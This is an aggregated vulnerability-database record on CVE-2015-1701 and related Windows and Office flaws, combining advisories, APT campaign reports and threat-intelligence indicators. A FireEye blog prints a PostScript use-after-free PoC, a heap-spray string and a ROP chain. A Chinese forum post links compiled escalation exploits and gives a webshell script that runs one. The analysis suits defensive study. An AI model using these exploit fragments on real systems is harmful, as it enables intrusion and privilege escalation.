\n[CVE-2015-1701](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1701>)7.2High \n[CVE-2015-1677](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1677>)2.1Warning \n[CVE-2015-1676](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1676>)2.1Warning \n[CVE-2015-1681](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1681>)1.9Warning \n[CVE-2015-1674](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1674>)1.9Warning \n[CVE-2015-1673](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1673>)9.3Critical \n[CVE-2015-1716](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1716>)5.0Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3045171](<http://support.microsoft.com/kb/3045171>) \n[3050941](<http://support.microsoft.com/kb/3050941>) \n[3049563](<http://support.microsoft.com/kb/3049563>) \n[3050946](<http://support.microsoft.com/kb/3050946>) \n[3050945](<http://support.microsoft.com/kb/3050945>) \n[3032655](<http://support.microsoft.com/kb/3032655>) \n[3055642](<http://support.microsoft.com/kb/3055642>) \n[3023221](<http://support.microsoft.com/kb/3023221>) \n[3051768](<http://support.microsoft.com/kb/3051768>) \n[3035490](<http://support.microsoft.com/kb/3035490>) \n[3023219](<http://support.microsoft.com/kb/3023219>) \n[3050514](<http://support.microsoft.com/kb/3050514>) \n[3057263](<http://support.microsoft.com/kb/3057263>) \n[3023211](<http://support.microsoft.com/kb/3023211>) \n[3023213](<http://support.microsoft.com/kb/3023213>) \n[3023215](<http://support.microsoft.com/kb/3023215>) \n[3023217](<http://support.microsoft.com/kb/3023217>) \n[3032662](<http://support.microsoft.com/kb/3032662>) \n[3032663](<http://support.microsoft.com/kb/3032663>) \n[3023220](<http://support.microsoft.com/kb/3023220>) \n[3057134](<http://support.microsoft.com/kb/3057134>) \n[3023222](<http://support.microsoft.com/kb/3023222>) \n[3061518](<http://support.microsoft.com/kb/3061518>) \n[3057191](<http://support.microsoft.com/kb/3057191>) \n[3035489](<http://support.microsoft.com/kb/3035489>) \n[3035488](<http://support.microsoft.com/kb/3035488>) \n[3035487](<http://support.microsoft.com/kb/3035487>) \n[3035486](<http://support.microsoft.com/kb/3035486>) \n[3035485](<http://support.microsoft.com/kb/3035485>) \n[3023223](<http://support.microsoft.com/kb/3023223>) \n[3023224](<http://support.microsoft.com/kb/3023224>)\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2015-05-12T00:00:00", "id": "KLA10580", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10580", "title": "\r KLA10580Multiple vulnerabilities in Microsoft products ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:41:09", "bulletinFamily": "info", "cvelist": ["CVE-2015-1680"], "edition": 3, "description": "This vulnerability allows local attackers to leak sensitive information on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the NtUserRealInternalGetMessage function. The issue lies in the failure to sanitize a buffer before returning its contents resulting in the leak of a kernel address. An attacker can leverage this together with another vulnerability to achieve code execution at SYSTEM.", "modified": "2015-06-22T00:00:00", "published": "2015-05-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-188/", "id": "ZDI-15-188", "title": "Microsoft Windows NtUserRealInternalGetMessage Stack Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:40:00", "bulletinFamily": "info", "cvelist": ["CVE-2015-1676"], "edition": 3, "description": "This vulnerability allows local attackers to leak sensitive information on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the NtUserGetTitleBarInfo function. The issue lies in the failure to sanitize a buffer before returning its contents resulting in the leak of a kernel address. An attacker can leverage this together with another vulnerability to achieve code execution at SYSTEM.", "modified": "2015-06-22T00:00:00", "published": "2015-05-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-190/", "id": "ZDI-15-190", "title": "Microsoft Windows NtUserGetTitleBarInfo Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:40:13", "bulletinFamily": "info", "cvelist": ["CVE-2015-1677"], "edition": 3, "description": "This vulnerability allows local attackers to leak sensitive information on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the NtUserGetScrollBarInfo function. The issue lies in the failure to sanitize a buffer before returning its contents resulting in the leak of a kernel address. An attacker can leverage this together with another vulnerability to achieve code execution at SYSTEM.", "modified": "2015-06-22T00:00:00", "published": "2015-05-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-185/", "id": "ZDI-15-185", "title": "Microsoft Windows NtUserGetScrollBarInfo Stack Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:50", "bulletinFamily": "info", "cvelist": ["CVE-2015-1679"], "edition": 3, "description": "This vulnerability allows local attackers to leak sensitive information on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the NtUserGetMessage function. The issue lies in the failure to sanitize a buffer before returning its contents resulting in the leak of a kernel address. An attacker can leverage this together with another vulnerability to achieve code execution at SYSTEM.", "modified": "2015-06-22T00:00:00", "published": "2015-05-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-187/", "id": "ZDI-15-187", "title": "Microsoft Windows NtUserGetMessage Stack Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:51", "bulletinFamily": "info", "cvelist": ["CVE-2015-1678"], "edition": 3, "description": "This vulnerability allows local attackers to leak sensitive information on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the NtUserGetComboBoxInfo function. The issue lies in the failure to sanitize a buffer before returning its contents resulting in the leak of a kernel address. An attacker can leverage this together with another vulnerability to achieve code execution at SYSTEM.", "modified": "2015-06-22T00:00:00", "published": "2015-05-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-186/", "id": "ZDI-15-186", "title": "Microsoft Windows NtUserGetComboBoxInfo Stack Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "fireeye": [{"lastseen": "2017-03-07T16:24:19", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701"], "description": "As defensive security controls raise the bar to attack, attackers will employ increasingly sophisticated techniques to complete their mission. Understanding the mechanics and impact of these threats is essential to systematically discover and deflect the coming wave of advanced attacks.\n\nMandiant has developed a comprehensive whitepaper that provides a multi-faceted analysis of the exploit payload \"Operation RussianDoll.\" This payload is an exploit for CVE-2015-1701 embedded within the un-obfuscated 64-bit RussianDoll payload (MD5: 54656d7ae9f6b89413d5b20704b43b10). The whitepaper references a freely available open-source proof of concept and provides malware triage analysts, reverse engineers, and exploit analysts with tools and background information to recognize and analyze future exploits. It also covers how red team analysts can apply these principles to carve out exploit functionality or augment exploits to produce tools that will enhance effectiveness of security operations.\n\nThe whitepaper walks the reader through the payload's actions to understand how to loosely identify what it does once it has gained kernel privilege. It then discusses how to obtain higher-resolution answers from reverse engineering by using WinDbg to confirm assumptions, manipulate control flow, and observe exploit behavior. Building on this and other published sources, a technically detailed exploit analysis is assembled by examining the relevant portions of win32k.sys. Finally, the paper discusses how to extract and augment this exploit to load encrypted, unsigned drivers into the Windows 7 x64 kernel address space.\n\nWe hope this analysis will support security professionals' understanding of the malware used by Advanced Persistent Threat (APT) actors and of tools and techniques that may be used to conduct enhanced analysis.\n\n**[Download the \"Lessons from Operation RussianDoll\" whitepaper here](<https://www2.fireeye.com/Lessons-from-Operation-RussianDoll-Matryoshka-Mining.html>).**\n", "modified": "2016-03-09T11:00:00", "published": "2016-03-09T11:00:00", "id": "FIREEYE:DD763521BC45EC12711FE1A267C7D8DE", "href": "https://www.fireeye.com/blog/threat-research/2016/03/lessons-from-operation-russian-doll.html", "type": "fireeye", "title": "Lessons from Operation RussianDoll", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701"], "description": "On Wednesday, Dec. 16, 2015, FireEye published [The EPS Awakens](<https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html>), detailing an exploit targeting a previously unknown Microsoft Encapsulated Postscript (EPS) _dict_ copy use-after-free vulnerability that was silently patched by Microsoft on November 10, 2015. The blog described the technical details of the vulnerability, and the steps needed to bypass the EPS filter and obtain full read and write access to the system memory.\n\nIn this follow-up blog, we discuss the operational details of the spear phishing campaigns associated with the exploit. Specifically, we detail the lures, attachments, targeting and malware, and examine the China-based advanced persistent threat (APT) group responsible for one of the observed attacks.\n\nActivity Summary \n\n\nBetween November 26, 2015, and December 1, 2015, known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech, government services, media and financial services industries. Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS _dict_ copy use-after-free vulnerability, and the local Windows privilege escalation vulnerability CVE-2015-1701. The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO, or a backdoor that we refer to as ELMER.\n\nThanksgiving Day Parade \n\n\nOn November 26, 2015, a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies. As shown in Figure 1, the emails originated from the Yahoo! email address **mts03282000@yahoo.co[.]jp**, and contained the subject \u201c**\u65b0\u5e74\u53f7\u5dfb\u982d\u8a00\u306e\u9001\u4ed8**\u201d (Google Translation: Sending of New Year No. Foreword).\n\nFigure 1. November 26, 2015 Phish SMTP header \n \nEach phishing message contained the same malicious Microsoft Word attachment. The malicious attachment resembled an article hosted on a legitimate Japanese defense-related website, as both discussed national defense topics and carried the same byline. The lure documents also used the Japanese calendar, as indicated by the 27th year in the Heisei period. This demonstrates that the threat actors understand conventional Japanese date notation.\n\nIRONHALO Downloader\n\nFollowing the exploitation of the EPS and CVE-2015-1701 vulnerabilities, the exploit payload drops either a 32-bit or 64-bit binary containing an embedded IRONHALO malware sample. IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path. \n\nThe encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp.\n\nTable 1. IRONHALO artifacts\n\nIRONHALO persists by copying itself to the current user\u2019s Startup folder. This variant sends an HTTP request to a legitimate Japanese website using a malformed User-Agent string, as shown in Figure 2. The threat actors likely compromised the legitimate site and attempted to use it as a staging server for second-stage payloads.\n\nFigure 2. IRONHALO HTTP GET request\n\n# December to Remember\n\nOn December 1, 2015, threat actors launched two additional spear phishing attacks exploiting the undisclosed EPS vulnerability and CVE-2015-1701. Unlike the Nov. 26 campaign, these attacks targeted Taiwanese governmental and media and entertainment organizations. Moreover, the exploit dropped a different malware payload, a backdoor we refer to as ELMER.\n\n### Lure Number One\n\nThe first spear phishing message was sent to a Taiwanese governmental employee on Dec. 1. The attachment was created using the traditional Chinese character set, and contained a flowchart that appeared to be taken from the legitimate Taiwanese government auction website **hxxp://shwoo.gov[.]taipei/buyer_flowchart.asp**. The image, shown in Figure 3, is a flowchart detailing how to place a trade on the Taipei Nature and Cherish Network website.\n\n\n\nFigure 3: Lure Image\n\n### Lure Number Two\n\nThe second December spear phishing attack targeted Taiwan-based news media organizations. The emails originated from the address **dpptccb.dpp@msa.hinet[.]net **(Figure 4),** **and contained the subject **DPP's Contact Information Update.** Based on the email address naming convention and message subject, the threat actors may have tried to make the message appear to be a legitimate communication from the Democratic Progressive Party (DPP), Taiwan\u2019s opposition party.\n\nFigure 4. December 1 Lure 2 SMTP Header\n\nUnlike the previous exploit documents, this malicious attachment did not contain any visible text when opened in Microsoft Word.\n\n### ELMER Backdoor\n\nThe exploit documents delivered during the December campaigns dropped a binary containing an embedded variant of a backdoor we refer to as ELMER. ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings.\n\nTo retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed. Table 2 lists the ELMER backdoors observed during the December campaigns.\n\nTable 2. ELMER variants\n\nThe ELMER variant **6c33223db475f072119fe51a2437a542** beaconed to the CnC IP address **121.127.249.74** over port 443. However the ELMER sample **0b176111ef7ec98e651ffbabf9b35a18** beaconed to the CnC domain **news.rinpocheinfo[.]com** over port 443. Both samples used the hard-coded User-Agent string \u201cMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)\u201d, as shown in Figure 5.\n\nFigure 5. ELMER beacon\n\n# APT16\n\nWhile attribution of the first two spear phishing attacks is still uncertain, we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16. This is based on the use of the known APT16 domain **rinpocheinfo[.]com**, as well as overlaps in previously observed targeting and tactics, techniques and procedures (TTPs).\n\n#### Background\n\nTaiwanese citizens will go to the polls on January 16, 2016, to choose a new President and legislators. According to recent opinion polls, the Democratic Progressive Party (DPP) candidate Tsai Ing-wen is leading her opponents and is widely expected to win the election. The DPP is part of the pan-green coalition that favors Taiwanese independence over reunification with the mainland, and the party\u2019s victory would represent a shift away from the ruling Kuomintang\u2019s closer ties with the PRC. Since 1949, Beijing has claimed Taiwan as a part of China and strongly opposes any action toward independence. The Chinese government is therefore concerned whether a DPP victory might weaken the commercial and tourism ties between China and Taiwan, or even drive Taiwan closer to independence. In 2005, the Chinese government passed an \u201canti-secession\u201d law that signified its intention to use \u201cnon-peaceful\u201d means to stymie any Taiwanese attempt to secede from China.\n\n#### Targeting Motivations\n\nAPT16 actors sent spear phishing emails to two Taiwanese media organization addresses and three webmail addresses. The message subject read \u201cDPP\u2019s Contact Information Update\u201d, apparently targeting those interested in contact information for DPP members or politicians. The Chinese government would benefit from improved insight into local media coverage of Taiwanese politics, both to better anticipate the election outcome and to gather additional intelligence on politicians, activists, and others who interact with journalists. This tactic is not without precedent; in 2013, the New York Times [revealed](<http://www.nytimes.com/2013/01/31/technology/chinese-hackers-infiltrate-new-york-times-computers.html>) it had been the target of China-based actors shortly after it reported on the alleged mass accumulation of [wealth](<http://www.nytimes.com/2012/10/26/business/global/family-of-wen-jiabao-holds-a-hidden-fortune-in-china.html>) by then-Prime Minister Wen Jiabao and his family. The actors likely sought information on the newspaper\u2019s sources in China, who could be silenced by the government.\n\nCompromising these Taiwanese news organizations would also allow the actors to gain access to informants or other protected sources, who might then be targeted for further intelligence collection or even retribution. The webmail addresses, while unknown, were possibly the personal-use addresses of the individuals whose corporate domain emails were targeted. As corporate networks become more secure and users become more vigilant, personal accounts can still offer a means to bypass security systems. This tactic exploits users\u2019 reduced vigilance when reading their own personal email, even when using corporate IT equipment to do so.\n\nOn the same date that APT16 targeted Taiwanese media, suspected Chinese APT actors also targeted a Taiwanese government agency, sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website. It is possible, although not confirmed, that APT16 was also responsible for targeting this government agency, given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor.\n\n#### We\u2019ve Been Here Before\n\nOne of the media organizations involved in this latest activity was targeted in June 2015, while its Hong Kong branch was similarly targeted in August 2015. APT16 actors were likely also responsible for the June 2015 activity. They sent spear phishing messages with the subject \u201c2015 Taiwan Security and Cultural Forum Invitation Form\u201d (2015\u53f0\u7063\u5b89\u5168\u6587\u5316\u8ad6\u58c7\u9080\u8acb\u51fd), and used a different tool \u2013 a tool that we refer to as DOORJAMB \u2013 in their attempt to compromise the organization. A different group, known as **admin@338**, used LOWBALL malware during its [Hong Kong activity](<https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html>). Despite the differing sponsorship, penetration of Hong Kong- and Taiwan-based media organizations continues to be a priority for China-based threat groups.\n\nThe difference in sponsorship could be the result of tasking systems that allocate targeting responsibility to different groups based on their targets\u2019 geographic location. In other words, while media organizations are important targets, it is possible that two separate groups are responsible for Hong Kong and Taiwan, respectively. The suspected APT16 targeting of the Taiwanese government agency \u2013 in addition to the Taiwanese media organizations \u2013 further supports this possibility.\n\n# Conclusion\n\nTable 3 contains a summary of the phishing activity detailed in this blog.Table 3. Activity summary\n\nThese clusters of activity raise interesting questions about the use of an identical silently-patched vulnerability, possibly by multiple threat groups. Both Japan and Taiwan are important intelligence collection targets for China, particularly because of recent changes to Japan\u2019s pacifist constitution and the upcoming Taiwanese election. Based on our visibility and available data, we only attribute one campaign to the Chinese APT group APT16. Nonetheless, the evidence suggests the involvement of China-based groups.\n", "modified": "2015-12-20T19:45:00", "published": "2015-12-20T19:45:00", "id": "FIREEYE:DA0253A0F53034703ED2573D2065BC4E", "href": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", "type": "fireeye", "title": "The EPS Awakens - Part 2", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:19", "bulletinFamily": "info", "cvelist": ["CVE-2015-2545", "CVE-2015-2546", "CVE-2015-1701"], "description": "On September 8, FireEye published details about an attack exploiting zero day vulnerabilities in Microsoft Office ([CVE-2015-2545](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2545>)) and Windows ([CVE-2015-2546](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2546>)). The attack was particularly notable because it leveraged PostScript to drive memory corruption in a way that had never been seen before. The exploit used similar strategies as browser exploits in common languages such as JavaScript and Flash, but PostScript served as an overlooked attack vector that is powerful and convenient in Office.\n\nFollowing the release of the patch for CVE-2015-2545, FireEye notified Microsoft of a way to bypass the patch. Microsoft not only fixed the bypass, but proactively hardened code throughout the Encapsulated PostScript (EPS) filter. The updates were quietly released on November 10 (Patch Tuesday).\n\nAt around 10:00AM in Japan on November 26 (around close of business the day before Thanksgiving in the U.S.), threat actors launched a spear phishing campaign. The emails contained document attachments that exploited a previously unknown EPS vulnerability. But there was a catch: the vulnerability was proactively patched in the Microsoft update released two weeks earlier.\n\nThe spearphishing emails to FireEye EX customers were blocked in the wild. FireEye appliances detect the exploit as Exploit.Dropper.docx.MVX and Malware.Binary.Docx.\n\nIn the first part of this blog series, we summarize recent threat group activity using this exploit and provide complete technical details of the vulnerability. Stay tuned for part two wherein we outline the operational details of the attack.\n\n#### Activity Summary\n\nIn late November and early December of 2015, FireEye observed multiple spear phishing campaigns exploiting a previously unknown Microsoft Office EPS vulnerability (detailed below) and Windows local privilege escalation vulnerability CVE-2015-1701. Over the course of several days, known and suspected China-based advanced persistent threat (APT) groups sent phishing emails containing malicious Word attachments to Japanese and Taiwanese organizations in the financial services, high-tech, media and government sectors respectively.\n\nThese attachments exploited a silently patched user-mode Microsoft EPS vulnerability (similar to Microsoft EPS use-after-free vulnerability CVE-2015-2545) and subsequently used CVE-2015-1701 to obtain SYSTEM level access to compromised machines. Following successful exploitation of each vulnerability, the exploit shellcode deployed either the IRONHALO downloader or the ELMER backdoor. FireEye currently detects IRONHALO as Trojan.IRONHALO.Downloader and ELMER as Backdoor.APT.Suroot.\n\n#### Vulnerability Details \u2013 Encapsulated PostScript dict copy Use-After-Free\n\n\n\nIn the form _dict1_ _dict2_ **copy**, the **copy** operator copies all of the elements from the first operand (_dict1_) into the second operand (_dict2_). [The PostScript Language Reference Manual (PLRM)](<http://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf>), as cited in Figure 1, states that the copy operator does not affect elements remaining in the second operand. For example, if _dict1 _contained an element under key _k1_, and _dict2 _contained elements under keys _k1_ and _k2_, then the operation _dict1_ _dict2_ **copy** should overwrite the element under _k1_, but should not affect the element under _k2_.\n\nHowever, Microsoft\u2019s EPS deviates from this standard. In Microsoft\u2019s implementation, the **copy **operator iteratively deletes all key-value entries from the _dict2_ internal hash table. Then, it deletes the hash table itself, and allocates a new one. Finally, it copies elements from _dict2_ into _dict2_. This deletion process is depicted in Figure 2.\n\n\n\nUsing the _dict1_ _dict2_ **copy **operation while enumerating _dict2_ with **forall **causes a use-after-free. During each iteration of the **forall** loop, _dict2_ dereferences a pointer (ptrNext) to push the next key-value pair onto the operator stack. When **copy** deletes the next key-value pair, ptrNext becomes stale. The next iteration of the **forall** loop will then push objects from the stale pointer onto the operator stack.\n\nIn an attack scenario, the attacker can allocate memory under the stale pointer. The attacker can then supply data that the **forall** enumerator reads as a key-value pair. In the appendix, we include a minimized PoC that shows how to allocate a string under the stale pointer and forge a key-value pair.\n\n#### Full Read and Write Development\n\nThe attacker gains access to memory by forging a string. Specifically, the attacker places a forged key-value pair under the stale ptrNext, and the key-value pair points to a forged string. The attacker uses a hardcoded address (130e0020h) in the forged key-value pair, and sprays memory at the address with PostScript strings. Figure 3 shows the PostScript that creates the sprayed string object, and the layout of the string in memory.\n\n/fakestr <28000e1358000e13bebafeca41414141414141414141414141414141030000004141414141414141414 \n1414124000e1300000000ffffff7fbebafeca41414141414141414141414141414141414141414141414 \n14141414100000000ffffff7f> def\n\n0:000> dd 130e0000 \n130e0000 00000000 00000000 00000000 00000000 \n130e0010 00000000 00000000 00000000 00000000 \n130e0020 130e0028 130e0058 cafebabe 41414141 \n130e0030 41414141 41414141 41414141 00000003 \n130e0040 41414141 41414141 41414141 130e0024 \n130e0050 00000000 7fffffff cafebabe 41414141 \n130e0060 41414141 41414141 41414141 41414141 \n130e0070 41414141 41414141 00000000 7fffffff\n\nFigure 3: The attacker's sprayed PostScript string\n\nEach PostScript string object allocates a buffer to store the actual contents of the string. The address and size of this buffer is stored within the string object. In the attacker\u2019s forged string object, the address of the buffer is 0, and the size of the buffer is 0x7fffffff.\n\n#### Return-Oriented Programming\n\nOnce the attacker has forged a string with size 0x7fffffff, they can use the string to freely read and write process memory. The attacker uses this capability to search for ROP gadgets and build a ROP chain.\n\n0:000> dd /c 1 130e1032 \n130e1032 60e2b53a // retn_gadget \n130e1036 60e2b53a // retn_gadget \n130e103a 00000000 \n130e103e 00000000 \n130e1042 60e69f80 // stack_pivot_gadget \n130e1046 60e398cd // set_eax_gadget, eax = 0xd7 \n130e104a 00000000 \n130e104e 00000000 \n130e1052 00000000 \n130e1056 777e5695 // ntcreateevent_gadget+0x5, NtProtectVirtualMemory \n130e105a 130e3000 // shellcode starts here \n130e105e ffffffff \n30e1062 130e0200 \n130e1066 130e0204 \n130e106a 00000040 \n130e106e 130e0208\n\n0:000> u 60e2b53a \nEPSIMP32+0xb53a: \n60e2b53a c20c00 ret 0Ch \n0:000> u 60e69f80 \nEPSIMP32!RegisterPercentCallback+0x2234e: \n60e69f80 94 xchg eax,esp \n60e69f81 c3 ret \n0:000> u 60e398cd \nEPSIMP32+0x198cd: // ecx = 130e1000, eax = 0xd760e398cd 8b4114 mov eax,dword ptr [ecx+14h] \n60e398d0 c3 ret \n0:000> u 777e5695 \nntdll!NtCreateEvent+0x5: \n777e5695 ba0003fe7f mov edx,offset SharedUserData!SystemCallStub \n777e569a ff12 call dword ptr [edx] \n777e569c c21400 ret 14h\n\nFigure 4: Attacker's ROP chain\n\nThe ROP chain, shown in Figure 4, uses a few known tricks to bypass security products. First, the ROP chain skips 5 bytes past the beginning of ntdll!NtCreateEvent. This would bypass any hooks placed on the beginning of the routine (and is known as \u201chook hopping\u201d), but the real purpose of this offset is to pass over an instruction that sets eax. This allows the attacker to specify their own parameter in eax, and call an arbitrary system call instead of NtCreateEvent. The attacker chooses the system call NtProtectVirtualMemory, which marks the attacker\u2019s shellcode as executable. Since the system call numbers differ between environments, the attacker reads the correct value for eax from the ntdll!NtProtectVirtualMemory function (which is the user-mode function that is normally used to call the NtProtectVirtualMemory syscall).\n\nTo transfer execution to the ROP chain, the attacker forges a file type object. Within the forged file type object, the attacker modifies the bytesavailable function pointer to point to a pivot (Figure 5). Then, when the attacker uses the forged object in PostScript, it calls the pivot and transfers execution to the ROP chain. When the ROP chain is complete, it returns into the attacker\u2019s shellcode.\n\n\n\nFigure 5: bytesavailable operator with the forged file type object \n\n\n#### Shellcode\n\nOnce the ROP chain finishes and returns to the attacker\u2019s shellcode, the shellcode loads a DLL that exploits CVE-2015-1701 to elevate the process to SYSTEM. The CVE-2015-1701 exploit is based on published source code from GitHub. Once the shellcode process has SYSTEM privileges, it will execute further payloads to be discussed in part two of this series.\n\n#### Acknowledgements\n\nThank you to Wang Yu, Dan Regalado and Junfeng Yang for their contributions to this blog.\n\n#### Appendix \nSimplified PoC\n\n%% Create dict2 and fill it with \n%% several key-value pairs \n/dict2 5 dict def \ndict2 begin \n/k1 1000 array def \n/k2 1000 array def \n\u2026 \ndict2 end\n\n%% Create dict1 and fill it with \n%% one key-value pair under k1 \n/dict1 3 dict def \ndict1 begin \n/k1 1000 array def \ndict1 end\n\n%% Begin forall enumeration on dict2 \ndict2 { \n\u2026 \n% Destroy dict2\u2019s internal hash-table, \n% freeing all key-value pairs \ndict1 dict2 copy \n\u2026 \n% Create a new string to overwrite the \n% freed key-value pair k2. \n% The string contains a forged key-value pair \n44 string \n0 <00000000ff0300000005000000000000000000002000e01303000000000000000000000044444444> putinterval \n% Next iteration of the loop uses stale. \n% ptrNext, which points into the above string, \n% and reads a forged key-pair \n\u2026 \n} forall\n", "modified": "2015-12-16T08:00:00", "published": "2015-12-16T08:00:00", "id": "FIREEYE:3E40A37BC7E6861E0920355DC6CAEDD1", "href": "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html", "type": "fireeye", "title": "The EPS Awakens", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2016-10-30T11:15:20", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701"], "edition": 1, "description": "Win32k elevation of privilege vulnerability \u2013 CVE-2 0 1 5-1 7 0 1 \nIf Win32k.sys kernel-mode driver improperly handles objects in memory, then there is a privilege elevation vulnerability. Successful exploitation of this vulnerability an attacker can run arbitrary code in kernel mode is. An attacker could then install programs; view, change, or delete data; or create with full user permissions to the new account. The update addresses the vulnerabilities by correcting Windows kernel-mode driver handles objects in memory to resolve the vulnerability. \nTo exploit this vulnerability, an attacker must be logged in to the system. Then, the attacker can run a to exploit this vulnerability a specially crafted application, so complete control of the affected system. \nThis vulnerability has been publicly disclosed. This security Bulletin was issued, Microsoft has informed that will exploit the vulnerability to very limited, targeted attacks. \nhttps://technet.microsoft.com/library/security/MS15-051 \n\nWin32k Elevation of Privilege Vulnerability. \nThe original source of information is the Fireye reported in the Russian APT28 team with the 0day to: \nOperation RussianDoll: Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia's APT28 in Highly-Targeted Attack \nhttps://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html \n\nProtection \nApply MS15-0 5 1 for fix. https://technet.microsoft.com/library/security/MS15-051 \n\nDownload \nTaihou64.exe \u548c Taihou32.exe \nhttps://github.com/hfiref0x/CVE-2015-1701/tree/master/Compiled \nSource: https://github.com/hfiref0x/CVE-2015-1701/tree/master/Source \n\nTest as shown in Figure: \n! [](/Article/UploadPic/2015-5/2015523233829579.jpg) \n\nms15-0 5 1 modified version \nPlus a 2 0 0 3 Support, and the streamlining of the part of the code, together with the ntdll. lib the library, and finally support in the webshell. \nThe original code is even compiled into 2 0 0 3-compatible format in 0 3 is not performed, because of win7 the following system does not export user32! gSharedInfo, only parsing the pdb or search pattern to locate; in addition to the different systems of the EPROCESS->Token offset is also different, these modifications in engineering have been added. \nEngineering is the vs2010 source code can be directly compiled. Project comes with two compiled exp, in 2 0 0 3 6 4-bit and 3 2 bits are tested successful. I tested with the virtual machine version is sp2, does not guarantee that other versions can be used. \nIf you find a version can not be used while the version number to tell me, I then modify(with a corresponding version of the system is a mirror download address is the best though). \nThis vulnerability does not affect Windows 8 and above versions, so can only do these. \nNote: the attachment in the exe with a kitchen knife to perform the words not taken back significantly, in fact, the command has been executed, if the output of the pid. \nIn aspxspy execution is not a problem, the chopper of the asp of the horse can use the following script: \nset x=createobject(\"wscript. shell\"). exec(\"c:\\inetpub\\wwwroot\\ms15-051.exe \"\"whoami /all\"\"\") \nresponse. write (x. stdout. readall & x. stderr. readall) \n\nThe source code has been updated, re-compile again no problem. \nTest screenshot: \n! [](/Article/UploadPic/2015-5/2 0 1 5 5 2 3 2 3 3 8 3 2 1 8 3. png) \n\nDownload: \n! [](/Article/UploadPic/2015-5/2 0 1 5 5 2 3 2 3 3 8 3 4 4 4 4. png) \nms15-051.zip \nBaidu network disk: the http://pan.baidu.com/s/1eQ1ZOzC \nUnzip password see note \n\n", "modified": 